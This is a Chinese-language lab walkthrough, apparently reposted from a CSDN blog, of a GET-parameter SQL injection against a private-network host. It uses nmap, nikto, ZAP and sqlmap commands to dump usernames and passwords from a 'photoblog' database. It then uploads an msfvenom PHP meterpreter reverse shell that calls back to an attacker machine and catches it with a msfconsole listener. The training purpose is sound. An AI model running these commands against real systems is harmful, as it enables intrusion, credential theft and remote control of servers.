SQL注入(get)

信息探测

扫描主机服务信息以及服务版本

nmap -sV 192.168.101.50

快速扫描全部信息

nmap -T4 -A -v 192.168.101.50

扫描敏感信息

nikto -host http://192.168.101.50:80

深入挖掘

分析nmap、nikto扫描结果,并对结果进行分析
使用浏览器打开http://192.168.101.50:80

漏洞扫描

使用web漏洞扫描器owasp-zap(ZAP)
打开之后选择Automated Scan,然后输入目标ip开始进行攻击,等待GET信息返回完毕
然后查看是否可以进行sql注入

使用sqlmap利用sql注入漏洞

sudo sqlmap -u "http://192.168.101.50/cat.php?id=3"		查看id是否具有sql漏洞

sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -dbs 		查看数据库名

sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" --tables	查看对应数据库中的表

sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" -T "users" --columns 	查看对应字段

sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" -T "users" -C 'login,password' --dump	查看对应字段的值

(也可以直接尝试sqlmap -u-url -os-shell直接获取shell)

得到用户名和密码后重新返回http://192.168.101.50:80使用用户名和密码登录



生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.101.51 lport=4444 -f raw 

gedit shellcd.php
(将生成的php代码拷贝到shellcd.php中)

上传shell反弹监听

打开msfconsole
msfconsole

启动监听模式
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.101.51
set lport 4444
run

文章来源地址https://uudwc.com/A/EvkL0

原文地址:https://blog.csdn.net/weixin_44774550/article/details/133244372

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请联系站长进行投诉反馈,一经查实,立即删除!

h
上一篇 2023年09月25日 14:13
下一篇 2023年09月25日 14:13